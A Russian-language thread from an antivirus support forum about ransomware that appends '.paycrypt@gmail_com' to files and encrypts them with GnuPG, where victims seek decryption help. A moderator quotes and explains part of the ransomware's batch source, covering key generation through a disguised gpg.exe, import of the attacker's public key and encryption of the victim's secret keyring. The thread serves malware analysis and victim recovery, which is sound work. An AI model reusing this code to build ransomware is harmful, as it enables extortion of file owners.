файлы зашифрованы с расширением .paycrypt / .keybtc@gmail_com , bat encoder / GnuPG

RSS

Сообщений: 1

Регистрация: 01.07.2014

Размещено 01.07.2014 22:11:05

За прошлую ночь зашифровались файлы на локальной машине и сетевом хранилище.
Письмо злоумышленников, ключ и декодер во вложении.
Просьба помочь с расшифровкой
---------
если у вас сохранились зашифрованные файлы *.paycrypt@gmail_com в период где то 1-30 июня 2014 года, пришлите на форум (или в почту [email protected])
несколько зашифрованных файлов и файл KEY.PRIVATE (он важен для восстановления ключа)
есть возможность сейчас восстановить ключ и расшифровать файлы.

Изменено: Валентин - 26.09.2017 05:04:55

Ответы

Пред. 1 ... 8 9 10 11 12 След.

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 30.10.2014 20:03:41

вам нужны эти ключи для расшифровки данных

gpg: зашифровано 2048-битным ключом RSA, с ID F05CF9EE, созданным 28.06.2014
"HckTeam (HckTeam) <[email protected]>"
gpg: сбой расшифрования: секретный ключ не найден

File: Z:\virus!!!\bat.encoder\[email protected]\2\KEY.PRIVATE
Time: 31.10.2014 0:00:12 (30.10.2014 17:00:12 UTC)

и этот:

gpg: зашифровано ключом RSA с ID 602A14A3
gpg: сбой расшифрования: секретный ключ не найден

File: Z:\virus!!!\bat.encoder\[email protected]\2\äèïëîì ïî ñåïàðàöèè.doc.paycrypt@gmail_com
Time: 31.10.2014 0:01:40 (30.10.2014 17:01:40 UTC)
---------
на будущее, защищаемся от данного вида энкодеров
http://forum.esetnod32.ru/forum9/topic11264/

Изменено: santy - 19.01.2017 06:58:18

[ Как создать образ автозапуска? ]

Сообщений: 8

Баллов: 4

Регистрация: 12.11.2014

Размещено 12.11.2014 16:15:35

У меня вопрос такой, не подскажите, нарыл:

Цитата
find_history=word.doc\|genkey.cry\|[email protected] m\|enter passphrase\|enter \\passphrase\|passphrase\|secring.gpg

и это:

Цитата
- [email protected]\|\x2022.\|cryptpay\|r ealname\|secring\|real name\|passhprase-file\|-file\|hckteam\|Team\|hck\|passphrase\|word.doc\|genkey.c ry\|enter passphrase\|enter \\passphrase\|secring.gpg

Изменено: Тим Абд - 12.11.2014 16:20:13

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 14.11.2014 05:46:42

если есть желание разобраться как работает криптографическая система PGP/GnuPG, так читаем первоисточники.
на форуме pgpru.com
https://www.pgpru.com/

[ Как создать образ автозапуска? ]

Сообщений: 8

Баллов: 4

Регистрация: 12.11.2014

Размещено 14.11.2014 07:37:45

Привет! Я тоже с drweb) там тоже послали читать основные понятия. А вы объяснить не можете?) Или если можно попробую расписать, а вы укажите на ошибки?

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 14.11.2014 08:06:39

а что конкретно вас интересует: технология работы криптографической системы PGP/GnuPG или исходный код бат_енкодера?

вот еще немного ссылок
http://forum.esetnod32.ru/forum9/topic11235/
http://forum.esetnod32.ru/forum9/topic11264/

[ Как создать образ автозапуска? ]

Сообщений: 8

Баллов: 4

Регистрация: 12.11.2014

Размещено 14.11.2014 08:38:38

)) конкретно по нашей ситуации, ликбез не нужен, хотел просто узнать, правильно ли мыслю:
HckTeam который в свою очередь шифрует нужный нам -->secring.gpg по ID f05cf9ee. Сам пуб.ключ(HckTeam) задается из: имени- cryptpay,
ящика- [email protected] и парольной фразы из файла- командой[--passhprase-file|-file(passphrase|word.doc)]
Созданный secring.gpg(приват ключ) при этом удаляется. Остается на память только пуб.ключ- HckTeam и key.private(шифр.secring)
За ответ заранее благодарен!

Изменено: Тим Абд - 14.11.2014 08:48:33

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 14.11.2014 08:43:59

вот например часть исходника, из нее должно быть все ясно, что откуда берется. svchost.exe здесь на самом деле это gpg.exe

Цитата
set namereal=cryptpay set pubname=HckTeam set exten=paycrypt@gmail_com echo Key-Type: RSA> "%TEMP%\genpair.keybtc" echo Key-Length: 1024>> "%TEMP%\genpair.keybtc" echo Name-Real: cryptpay>> "%TEMP%\genpair.keybtc" echo Name-Comment: cryptpay>> "%TEMP%\genpair.keybtc" echo Name-Email: [email protected]>> "%TEMP%\genpair.keybtc" "%TEMP%\svchost.exe" --batch --homedir "%TEMP%" --gen-key "%TEMP%\genpair.keybtc" if exist "%TEMP%\genpair.keybtc" del /f /q "%TEMP%\genpair.keybtc" echo -----BEGIN PGP PUBLIC KEY BLOCK-----> "%TEMP%\impubkey.keybtc" echo Version: GnuPG v1>> "%TEMP%\impubkey.keybtc" echo.>> "%TEMP%\impubkey.keybtc" echo mI0EU66eugEEAMUDWYQ1l5N4ItPb23UBA6Embly6Zenqiut9m1h3Ac6L8sKn+ZJ4>> "%TEMP%\impubkey.keybtc" echo F67ytP5de2eNEkGAxgwO2BSmmFCZ+OKx3U0M8gim+YlYm6Ho9irtrqHqdqBF8UmG>> "%TEMP%\impubkey.keybtc" echo dz8SsGDe1OPUJsOZ7bZ80K3YM+TnEGtxt3nU9hynw3enyBI8SaT3SySDABEBAAG0>> "%TEMP%\impubkey.keybtc" echo Jkhja1RlYW0gKEhja1RlYW0pIDxwYXljcnlwdEBnbWFpbC5jb20+iLgEEwECACIF>> "%TEMP%\impubkey.keybtc" echo AlOunroCGwMGCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEDY5qe4+146FFo8D>> "%TEMP%\impubkey.keybtc" echo /Ayg3NQDHX9O5BhIzhWwcbYHxwJRqvyi2ZENCqI9hM53BHJQFKR1YUhX9kAfKEbY>> "%TEMP%\impubkey.keybtc" echo gPJWYOg1QYY3VpEuNCHTJENCwXwH6DYs99GwO7f/8Dc6F7aDdGo3GSWKEwPuHv0F>> "%TEMP%\impubkey.keybtc" echo FM7lcfz3GkGiSJWdTwHh383FmLY+cHk6ALf+EcgKA3PmuI0EU66eugEEANu1dTdR>> "%TEMP%\impubkey.keybtc" echo fjZ99jViRV3FXPF3wrMTh1ODqeMLu9sYDtAKn5VgqbOQcymkRq4MMrX8St1VjAQ4>> "%TEMP%\impubkey.keybtc" echo Wsxbl47Wo4opsqogVUQV2ok2vm35u3OELQlR6Loihu+CksAxaloPGe5IyryJ+Cbn>> "%TEMP%\impubkey.keybtc" echo ymRvoHlPVhExYD3FQCiomXmrYm173ipIKlkzABEBAAGInwQYAQIACQUCU66eugIb>> "%TEMP%\impubkey.keybtc" echo DAAKCRA2OanuPteOheY5BACvmE5n9gNr66SjIK6z2i1FC5Ei5R15jeu42C560Q3M>> "%TEMP%\impubkey.keybtc" echo 76gS6nSwdxaVjCynMts1Y/xRFd360RIBLY5XA4INteXUSYvUjKarF9mpPqorJ1fh>> "%TEMP%\impubkey.keybtc" echo XRK2jlwW+1ppH5rpWxP8WfTfHOHmOAjVM0EjlqjjOiqByJfXWoufBzt5uMQ/rnmi>> "%TEMP%\impubkey.keybtc" echo gQ==>> "%TEMP%\impubkey.keybtc" echo =f2Fp>> "%TEMP%\impubkey.keybtc" echo -----END PGP PUBLIC KEY BLOCK----->> "%TEMP%\impubkey.keybtc" "%TEMP%\svchost.exe" --import "%TEMP%\impubkey.keybtc" if exist "%TEMP%\impubkey.keybtc" del /f /q "%TEMP%\impubkey.keybtc" "%TEMP%\svchost.exe" -r !pubname! --yes -q --no-verbose --trust-model always -e "%TEMP%\secring.gpg"

Цитата

set namereal=cryptpay
set pubname=HckTeam
set exten=paycrypt@gmail_com
echo Key-Type: RSA> "%TEMP%\genpair.keybtc"
echo Key-Length: 1024>> "%TEMP%\genpair.keybtc"
echo Name-Real: cryptpay>> "%TEMP%\genpair.keybtc"
echo Name-Comment: cryptpay>> "%TEMP%\genpair.keybtc"
echo Name-Email: [email protected]>> "%TEMP%\genpair.keybtc"
"%TEMP%\svchost.exe" --batch --homedir "%TEMP%" --gen-key "%TEMP%\genpair.keybtc"
if exist "%TEMP%\genpair.keybtc" del /f /q "%TEMP%\genpair.keybtc"
echo -----BEGIN PGP PUBLIC KEY BLOCK-----> "%TEMP%\impubkey.keybtc"
echo Version: GnuPG v1>> "%TEMP%\impubkey.keybtc"
echo.>> "%TEMP%\impubkey.keybtc"
echo mI0EU66eugEEAMUDWYQ1l5N4ItPb23UBA6Embly6Zenqiut9m1h3Ac6L8sKn+ZJ4>> "%TEMP%\impubkey.keybtc"
echo F67ytP5de2eNEkGAxgwO2BSmmFCZ+OKx3U0M8gim+YlYm6Ho9irtrqHqdqBF8UmG>> "%TEMP%\impubkey.keybtc"
echo dz8SsGDe1OPUJsOZ7bZ80K3YM+TnEGtxt3nU9hynw3enyBI8SaT3SySDABEBAAG0>> "%TEMP%\impubkey.keybtc"
echo Jkhja1RlYW0gKEhja1RlYW0pIDxwYXljcnlwdEBnbWFpbC5jb20+iLgEEwECACIF>> "%TEMP%\impubkey.keybtc"
echo AlOunroCGwMGCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEDY5qe4+146FFo8D>> "%TEMP%\impubkey.keybtc"
echo /Ayg3NQDHX9O5BhIzhWwcbYHxwJRqvyi2ZENCqI9hM53BHJQFKR1YUhX9kAfKEbY>> "%TEMP%\impubkey.keybtc"
echo gPJWYOg1QYY3VpEuNCHTJENCwXwH6DYs99GwO7f/8Dc6F7aDdGo3GSWKEwPuHv0F>> "%TEMP%\impubkey.keybtc"
echo FM7lcfz3GkGiSJWdTwHh383FmLY+cHk6ALf+EcgKA3PmuI0EU66eugEEANu1dTdR>> "%TEMP%\impubkey.keybtc"
echo fjZ99jViRV3FXPF3wrMTh1ODqeMLu9sYDtAKn5VgqbOQcymkRq4MMrX8St1VjAQ4>> "%TEMP%\impubkey.keybtc"
echo Wsxbl47Wo4opsqogVUQV2ok2vm35u3OELQlR6Loihu+CksAxaloPGe5IyryJ+Cbn>> "%TEMP%\impubkey.keybtc"
echo ymRvoHlPVhExYD3FQCiomXmrYm173ipIKlkzABEBAAGInwQYAQIACQUCU66eugIb>> "%TEMP%\impubkey.keybtc"
echo DAAKCRA2OanuPteOheY5BACvmE5n9gNr66SjIK6z2i1FC5Ei5R15jeu42C560Q3M>> "%TEMP%\impubkey.keybtc"
echo 76gS6nSwdxaVjCynMts1Y/xRFd360RIBLY5XA4INteXUSYvUjKarF9mpPqorJ1fh>> "%TEMP%\impubkey.keybtc"
echo XRK2jlwW+1ppH5rpWxP8WfTfHOHmOAjVM0EjlqjjOiqByJfXWoufBzt5uMQ/rnmi>> "%TEMP%\impubkey.keybtc"
echo gQ==>> "%TEMP%\impubkey.keybtc"
echo =f2Fp>> "%TEMP%\impubkey.keybtc"
echo -----END PGP PUBLIC KEY BLOCK----->> "%TEMP%\impubkey.keybtc"
"%TEMP%\svchost.exe" --import "%TEMP%\impubkey.keybtc"
if exist "%TEMP%\impubkey.keybtc" del /f /q "%TEMP%\impubkey.keybtc"
"%TEMP%\svchost.exe" -r !pubname! --yes -q --no-verbose --trust-model always -e "%TEMP%\secring.gpg"

[ Как создать образ автозапуска? ]

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 14.11.2014 08:48:08

эта команда генерерирует пару pub/sec ключей на стороне пользователя.

Цитата
"%TEMP%\svchost.exe" --batch --homedir "%TEMP%" --gen-key "%TEMP%\genpair.keybtc"

эта команда импортирует созданный паб ключ, которым затем будет выполнено шифрование secring.gpg из созданной pub/sec ключевой пары.

Цитата
"%TEMP%\svchost.exe" --import "%TEMP%\impubkey.keybtc"

т.е. здесь не делается секрета из содержимого pub key которым выполнено шифрование secring.gpg,
потому что для расшифровки его нужна секретная часть этого ключа, которой нет на компе юзера.

а эта команда уже шифрует secring.gpg

Цитата
"%TEMP%\svchost.exe" -r !pubname! --yes -q --no-verbose --trust-model always -e "%TEMP%\secring.gpg"

Изменено: santy - 14.11.2014 09:35:14

[ Как создать образ автозапуска? ]

Сообщений: 8

Баллов: 4

Регистрация: 12.11.2014

Размещено 14.11.2014 11:22:55

Цитата
Парольная фраза - это тот самый пароль, которые будет подбирать человек, заполучивший вдруг файл с вашими ключами. Здесь надо ввести длинную фразу с модификациями, содержащую латинские буквы, цифры, пробелы и знаки препинания. Важно потом не забыть эту фразу. Вводим: O4enb !-==-! 3aMoPo4eHHaja :*: Fraza... Потом нас просят ввести то же самое еще раз (для надежности). После этого программе потребуются ваши случайные нажатия на клавиатуре: ........... При расшифровке: Расшифровывание сообщения производится еще проще. Последует запрос пароля, той самой парольной фразы (Pass Phrase)

Цитата

Парольная фраза - это тот самый пароль, которые будет подбирать человек, заполучивший вдруг файл с вашими ключами. Здесь надо ввести длинную фразу с модификациями, содержащую латинские буквы, цифры, пробелы и знаки препинания. Важно потом не забыть эту фразу.

Вводим: O4enb !-==-! 3aMoPo4eHHaja :*: Fraza...

Потом нас просят ввести то же самое еще раз (для надежности).
После этого программе потребуются ваши случайные нажатия на клавиатуре:
...........
При расшифровке:
Расшифровывание сообщения производится еще проще. Последует запрос пароля, той самой парольной фразы (Pass Phrase)

Значит для расшифровки файла нужна только парольная фраза, но при наличии самого sec- файла? Это я к:

Цитата
santy пишет: для расшифровки его нужна секретная часть этого ключа

----------------------------------------------
Заранее Спасибо За Ответы!

Изменено: Тим Абд - 14.11.2014 11:44:44

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 14.11.2014 11:50:00

предполагаю, что если пара ключей была создана в таком режиме

Цитата
--batch

то secring.gpg создается без парольной фразы, или с пустым паролем.

т.е. в данном случае для расшифровки файлов нужен только secring.gpg. это если вы захотите расшифровать личные доки, зашифрованные на компе.

если же вы заходите расшифровать KEY.PRIVATE (в котором находится ваш secring.gpg), то для этого необходим sec ключ злоумышленников,
а вот он скорее всего создан в интерактивном режиме и с наличием парольной фразы.

возможно, наличие парольной фразы, (скорее всего), не влияет на расшифровку файла. эта фраза (точно) защищает от изменения состава ключа,
т.е. добавление подключа, добавление доверия и т.п.
-------
можете установить GnuPG на свой комп и все проверить.
https://www.gnupg.org/download/index.en.html
http://www.gnupg.org/documentation/index.en.html

Изменено: santy - 14.11.2014 11:57:24

[ Как создать образ автозапуска? ]

Пред. 1 ... 8 9 10 11 12 След.

файлы зашифрованы с расширением *.paycrypt / *.keybtc@gmail_com , bat encoder / GnuPG

Ответы

файлы зашифрованы с расширением .paycrypt / .keybtc@gmail_com , bat encoder / GnuPG